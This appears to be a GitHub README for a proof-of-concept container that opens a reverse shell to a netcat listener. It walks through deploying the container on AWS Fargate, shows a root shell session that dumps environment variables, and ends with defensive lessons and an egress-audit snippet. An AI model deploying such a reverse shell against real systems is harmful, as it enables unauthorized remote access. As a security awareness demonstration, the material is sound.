Project author: ayeks

Project description:
Run a simple reverse shell in a container and deploy it on AWS Fargate.
Language: Dockerfile
Project address: git://github.com/ayeks/reverse_shell.git
Created: 2020-05-01T16:28:06Z
Project community: https://github.com/ayeks/reverse_shell

License: MIT License


Reverse Shell Container

Run a container which connects back to a server with a reverse shell.

Usage of the remote shell container

Follow these steps to connect back to a shell from within a container.

Start the server

The reverse shell in the container will connect back to your server.
Open up a port with the following snippet:

  nc -lvvp 6666

optional: Build the image

  docker build -t ayeks/reverse_shell:latest .

Execute the image

Run the reverse shell container with:

  docker run --rm -it -e IP=192.168.178.26 -e PORT=6666 ayeks/reverse_shell

Start the reverse shell container in AWS Fargate

We all run third-party components in our Kubernetes clusters without paying
much attention to what they do. This example shows how to set up the reverse
shell as a Fargate container and how it connects back to an EC2 server.

Setup the AWS Security Groups

Create a reference security group for the container; the server's security
group will allow ingress from it.

  • Security Group Name: sg_reverse_shell_reference
  • Inbound Rules: none
  • Outbound Rules:
    • All traffic All All 0.0.0.0/0

Create a security group for your server that allows you to connect to it via
SSH from home and with the reverse shell from the container.

  • Security Group Name: sg_server
  • Inbound Rules:
    • All TCP TCP 0 - 65535 sg-RANDOMNUMBER(sg_reverse_shell_reference)
    • SSH TCP 22 YOUR_PUBLIC_IP/32
  • Outbound Rules:
    • All traffic All All 0.0.0.0/0
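The reference group above keeps the default "all traffic to 0.0.0.0/0" egress rule, which is exactly what lets the container reach the listener on port 6666. This added example (not code from the ayeks/reverse_shell repository) audits egress rules in the shape that `aws ec2 describe-security-groups` returns; both group dicts are constructed, the first matching sg_reverse_shell_reference and the second a hardened variant that only allows HTTPS out.

```python
"""Audit security-group egress rules for the 'everything out' pattern.
Added example, not part of ayeks/reverse_shell. The dicts mirror the shape
`aws ec2 describe-security-groups` (and boto3) returns; both are constructed.
"""
from typing import Dict, List

# Constructed: the reference group exactly as the README describes it.
SG_REFERENCE = {
    "GroupId": "sg-RANDOMNUMBER",  # placeholder id, as in the README
    "GroupName": "sg_reverse_shell_reference",
    "IpPermissionsEgress": [
        {"IpProtocol": "-1", "IpRanges": [{"CidrIp": "0.0.0.0/0"}],
         "Ipv6Ranges": [], "UserIdGroupPairs": []},
    ],
}

# Constructed hardened variant: only HTTPS out, which is all the image pull needs.
SG_HARDENED = {
    "GroupId": "sg-EXAMPLEHARDENED",  # placeholder id
    "GroupName": "sg_reverse_shell_reference_hardened",
    "IpPermissionsEgress": [
        {"IpProtocol": "tcp", "FromPort": 443, "ToPort": 443,
         "IpRanges": [{"CidrIp": "0.0.0.0/0"}], "Ipv6Ranges": [], "UserIdGroupPairs": []},
    ],
}


def rule_covers_port(rule: Dict, port: int) -> bool:
    """True if this egress rule lets TCP traffic to `port` leave (all-protocol rules count)."""
    if rule["IpProtocol"] == "-1":
        return True
    if rule["IpProtocol"] != "tcp":
        return False
    return rule.get("FromPort", 0) <= port <= rule.get("ToPort", 65535)


def egress_findings(sg: Dict, watched_port: int = 6666) -> List[str]:
    """One finding per egress rule that would let a container reach `watched_port`
    (the README's listener port) or anything at all on the internet."""
    findings = []
    for rule in sg["IpPermissionsEgress"]:
        targets = [r["CidrIp"] for r in rule.get("IpRanges", [])]
        targets += [r["CidrIpv6"] for r in rule.get("Ipv6Ranges", [])]
        targets += [r["GroupId"] for r in rule.get("UserIdGroupPairs", [])]
        if rule["IpProtocol"] == "-1" and "0.0.0.0/0" in targets:
            findings.append(f"{sg['GroupName']}: all traffic to 0.0.0.0/0 (default egress rule still in place)")
        elif rule_covers_port(rule, watched_port):
            findings.append(f"{sg['GroupName']}: TCP {watched_port} reachable via {', '.join(targets)}")
    return findings
```

With the hardened group the container can still pull its image but cannot open the connection back on 6666, which is the single change that would have stopped this setup.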

Setup the AWS EC2 server

Just choose an EC2 machine that you like. Attach the security group
sg_server to this machine. Start the server and connect to it via SSH.

Create a new container task definition

Create a new task definition for the reverse shell container. Only add the
necessary information.

  • Task Definition Name: reverse_shell
  • Task Memory: 0.5GB
  • Task CPU: 0.25 vCPU
  • Container Definition:
    • Container Name: reverse_shell
    • Image: ayeks/reverse_shell
    • Memory Limit: Soft limit 400
    • Environment Variables:
      • IP - your server's internal IP address
      • PORT - 6666

Start the reverse shell container in AWS ECS

Before you run the task make sure that you listen for the container at your server:

  nc -lvvp 6666

Now go to your cluster and hit run task:

  • Launch Type: Fargate
  • Task Definition: reverse_shell
  • Cluster VPC: your favourite VPC
  • Subnets: your favourite subnet
  • Security Groups: edit and select the existing: sg_reverse_shell_reference
  • Auto-assign public IP: Enabled (without this the task cannot pull the image from Docker Hub)

As a result the container should connect back to your server. You are now able to execute commands directly in the container, e.g. uname -a:

  [ec2-user@ip-172-31-39-189 ~]$ nc -lvvp 6666
  Ncat: Version 7.50 ( https://nmap.org/ncat )
  Ncat: Listening on :::6666
  Ncat: Listening on 0.0.0.0:6666
  Ncat: Connection from 172.31.2.37.
  Ncat: Connection from 172.31.2.37:56656.
  bash: cannot set terminal process group (1): Inappropriate ioctl for device
  bash: no job control in this shell
  root@ip-172-31-2-37:/# uname -a
  uname -a
  Linux ip-172-31-2-37.eu-west-1.compute.internal 4.14.158-129.185.amzn2.x86_64 #1 SMP Tue Dec 24 03:15:32 UTC 2019 x86_64 GNU/Linux

Printing the environment variables:

  root@ip-172-31-2-37:/# env
  env
  AWS_EXECUTION_ENV=AWS_ECS_FARGATE
  HOSTNAME=ip-172-31-2-37.eu-west-1.compute.internal
  AWS_DEFAULT_REGION=eu-west-1
  AWS_REGION=eu-west-1
  PWD=/
  PORT=6666
  HOME=/root
  IP=172.31.39.189
  ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/b9fa9196-e49a-4140-ae3b-bd7322cfbd44
  SHLVL=2
  PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  _=/usr/bin/env

Or, after installing it with apt-get, you can run lshw:

  root@ip-172-31-2-37:/# lshw
  lshw
  ip-172-31-2-37.eu-west-1.compute.internal
      description: Computer
      width: 64 bits
      capabilities: smp vsyscall32
    *-core
         description: Motherboard
         physical id: 0
       *-memory
            description: System memory
            physical id: 0
            size: 4GiB
       *-cpu
            product: Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz
            vendor: Intel Corp.
            physical id: 1
            bus info: cpu@0
            width: 64 bits
  ...

Troubleshooting

If your container task does not reach the state RUNNING but goes into
STOPPED, have a look at the stop reason. If the container is not able to
connect to your server it just dies and returns Exit Code 1.
Check the security groups and other networking settings if that happens.

Lessons Learned

  • think twice before using random containers from the internet
  • do not assume you are safe just because you don't allow ingress traffic: the container here only ever opens outbound connections
  • do not run the container as root; with root it can install whatever tooling it wants (as apt-get did above)
  • strip the container base image down as much as possible to reduce the tools available inside it